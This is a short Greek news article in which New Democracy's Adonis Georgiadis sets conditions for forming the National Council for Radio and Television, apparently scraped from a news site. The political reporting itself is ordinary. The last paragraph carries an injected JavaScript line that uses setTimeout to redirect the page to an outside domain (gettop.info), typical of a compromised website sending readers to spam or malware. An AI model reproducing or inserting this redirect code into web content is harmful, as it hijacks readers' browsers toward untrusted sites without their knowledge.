Γεωργιάδης: Πρώτα η συγκρότηση του ΕΣΡ και μετά τα πρόσωπα

0
13

Η Νέα Δημοκρατία δεν μπαίνει σε αυτήν τη φάση σε συζήτηση των ονομάτων για τη συγκρότηση του Εθνικού Συμβουλίου Ραδιοτηλεόρασης, απάντησε ο αντιπρόεδρος του κόμματος Άδωνις Γεωργιάδης στην ερώτηση του Αθηναϊκού-Μακεδονικού Πρακτορείου Ειδήσεων γιατί το κόμμα του λέει «όχι» στην πρόταση να είναι πρόεδρος της ανεξάρτητης Αρχής ο Βύρων Πολύδωρας.

Θέτει ως προϋποθέσεις για να συναινέσει η ΝΔ στη συγκρότηση του ΕΣΡ να γίνει πρώτα γνωστό το πλήρες σκεπτικό της απόφασης του Συμβουλίου της Επικρατείας και να αποσυρθεί ο νόμος Παππά με επιστροφή των αρμοδιοτήτων στο ΕΣΡ.

Ο κ. Γεωργιάδης κάνει λόγο για «σύγκρουση θεσμών», που «την περασμένη φορά που είχαμε στην Ελλάδα, η κατάληξη δεν ήταν καλή» και προσθέτει ότι «οι πολίτες πρέπει να είναι έτοιμοι να κάνουν ό,τι χρειαστεί για να προστατέψουν τη Δημοκρατία τους».

Τέλος, δεν αποδέχεται τον όρο «mea culpa» σχετικά με όσα είπε για την Αριστερά, σημειώνοντας ότι δεν ήταν λάθος, αλλά ίσως έπρεπε να τα είχε διευκρινίσει πολύ καλύτερα. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here